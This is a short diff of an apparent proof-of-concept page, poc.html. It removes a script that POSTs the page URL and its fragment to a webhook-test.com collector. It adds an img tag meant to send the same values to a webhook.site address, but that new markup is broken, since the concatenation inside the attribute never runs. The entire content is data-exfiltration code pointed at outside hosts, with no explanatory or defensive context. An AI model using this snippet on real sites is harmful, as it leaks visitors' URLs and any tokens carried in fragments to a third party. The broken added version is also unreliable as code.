--- a/poc.html
+++ b/poc.html
@@ -1,9 +1,3 @@
-<script>
-const url = location.href;            // chứa cả fragment
-const frag = location.hash || '';     // "#abc" hoặc ''
-fetch('https://webhook-test.com/1adf7ab5400fb9e54c12ff7f9f7fff71', {
-  method: 'POST',
-  headers: {'Content-Type':'application/json'},
-  body: JSON.stringify({url, fragment: frag})
-}).catch(()=>{});
-</script>
+<img src="https://webhook.site/8338a31b-9726-49c3-be5f-97874b2dee6b?u="
+     + encodeURIComponent(location.href)
+     + "&h=" + encodeURIComponent(location.hash)>
